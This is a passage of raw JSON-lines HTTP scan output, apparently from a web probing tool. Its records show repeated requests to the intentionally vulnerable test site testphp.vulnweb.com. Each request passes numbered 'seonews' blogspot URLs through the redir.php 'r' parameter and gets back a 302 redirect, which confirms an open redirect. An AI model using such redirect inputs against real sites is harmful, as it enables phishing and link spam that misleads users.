ntent_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1556.blogspot.com/\",\"time\":\"348.336437ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:46.469669624Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1556.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1556.blogspot.com/management.html\",\"location\":\"http://seonews1556.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1556.blogspot.com/management.html\",\"time\":\"339.146991ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:49.623007623Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1557.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1557.blogspot.com/\",\"location\":\"http://seonews1557.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1557.blogspot.com/\",\"time\":\"344.200212ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:49.846430139Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1557.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1557.blogspot.com/management.html\",\"location\":\"http://seonews1557.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1557.blogspot.com/management.html\",\"time\":\"354.129225ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:49.882913642Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1559.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1559.blogspot.com/\",\"location\":\"http://seonews1559.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1559.blogspot.com/\",\"time\":\"344.134385ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:49.939348905Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1560.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1560.blogspot.com/management.html\",\"location\":\"http://seonews1560.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1560.blogspot.com/management.html\",\"time\":\"358.084443ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:50.339982077Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1561.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1561.blogspot.com/management.html\",\"location\":\"http://seonews1561.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1561.blogspot.com/management.html\",\"time\":\"355.809762ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:50.727453143Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1562.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1562.blogspot.com/\",\"location\":\"http://seonews1562.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1562.blogspot.com/\",\"time\":\"338.685288ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:50.778822708Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1563.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1563.blogspot.com/\",\"location\":\"http://seonews1563.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1563.blogspot.com/\",\"time\":\"349.050761ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:50.970238188Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1564.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1564.blogspot.com/\",\"location\":\"http://seonews1564.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1564.blogspot.com/\",\"time\":\"357.207893ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:51.500762863Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1564.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1564.blogspot.com/management.html\",\"location\":\"http://seonews1564.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1564.blogspot.com/management.html\",\"time\":\"357.343539ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:51.528778755Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1566.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1566.blogspot.com/management.html\",\"location\":\"http://seonews1566.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1566.blogspot.com/management.html\",\"time\":\"346.943327ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:53.265773163Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1568.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1568.blogspot.com/management.html\",\"location\":\"http://seonews1568.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1568.blogspot.com/management.html\",\"time\":\"355.640016ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:54.50669449Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1569.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1569.blogspot.com/management.html\",\"location\":\"http://seonews1569.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1569.blogspot.com/management.html\",\"time\":\"357.117813ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:54.562022968Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1570.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1570.blogspot.com/management.html\",\"location\":\"http://seonews1570.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1570.blogspot.com/management.html\",\"time\":\"343.190741ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:54.900935493Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1572.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1572.blogspot.com/\",\"location\":\"http://seonews1572.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1572.blogspot.com/\",\"time\":\"350.54507ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:55.732567684Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1573.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1573.blogspot.com/management.html\",\"location\":\"http://seonews1573.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1573.blogspot.com/management.html\",\"time\":\"344.936209ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:55.767458366Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1574.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1574.blogspot.com/management.html\",\"location\":\"http://seonews1574.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1574.blogspot.com/management.html\",\"time\":\"352.489614ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:55.807415295Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1575.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1575.blogspot.com/\",\"location\":\"http://seonews1575.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1575.blogspot.com/\",\"time\":\"338.705184ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:55.818664912Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1576.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1576.blogspot.com/\",\"location\":\"http://seonews1576.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1576.blogspot.com/\",\"time\":\"350.74217ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.164098571Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1576.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1576.blogspot.com/management.html\",\"location\":\"http://seonews1576.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1576.blogspot.com/management.html\",\"time\":\"355.073414ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.173588628Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1577.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1577.blogspot.com/management.html\",\"location\":\"http://seonews1577.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1577.blogspot.com/management.html\",\"time\":\"346.697307ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.237092786Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1579.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1579.blogspot.com/management.html\",\"location\":\"http://seonews1579.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1579.blogspot.com/management.html\",\"time\":\"350.581982ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.285636148Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1582.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1582.blogspot.com/\",\"location\":\"http://seonews1582.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1582.blogspot.com/\",\"time\":\"339.067899ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.303250303Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1583.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1583.blogspot.com/\",\"location\":\"http://seonews1583.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1583.blogspot.com/\",\"time\":\"355.088126ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.411447997Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1584.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1584.blogspot.com/\",\"location\":\"http://seonews1584.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1584.blogspot.com/\",\"time\":\"342.770537ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.458522646Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1584.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1584.blogspot.com/management.html\",\"location\":\"http://seonews1584.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1584.blogspot.com/management.html\",\"time\":\"344.35934ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.502709965Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1586.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1586.blogspot.com/\",\"location\":\"http://seonews1586.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1586.blogspot.com/\",\"time\":\"342.371609ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.571672222Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1586.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1586.blogspot.com/management.html\",\"location\":\"http://seonews1586.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1586.blogspot.com/management.html\",\"time\":\"346.240755ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.654187017Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1587.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1587.blogspot.com/\",\"location\":\"http://seonews1587.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1587.blogspot.com/\",\"time\":\"344.24673ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.71937779Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1587.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1587.blogspot.com/management.html\",\"location\":\"http://seonews1587.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1587.blogspot.com/management.html\",\"time\":\"344.500383ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:56.825429954Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1590.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1590.blogspot.com/\",\"location\":\"http://seonews1590.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1590.blogspot.com/\",\"time\":\"351.841156ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:59.968014534Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1590.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1590.blogspot.com/management.html\",\"location\":\"http://seonews1590.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1590.blogspot.com/management.html\",\"time\":\"343.210705ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:00.209386607Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1592.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1592.blogspot.com/\",\"location\":\"http://seonews1592.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1592.blogspot.com/\",\"time\":\"360.674424ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:00.228600224Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1592.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1592.blogspot.com/management.html\",\"location\":\"http://seonews1592.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1592.blogspot.com/management.html\",\"time\":\"343.474289ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:00.280878874Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1593.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1593.blogspot.com/\",\"location\":\"http://seonews1593.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1593.blogspot.com/\",\"time\":\"339.609489ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:00.692906419Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1593.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1593.blogspot.com/management.html\",\"location\":\"http://seonews1593.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1593.blogspot.com/management.html\",\"time\":\"350.649139ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\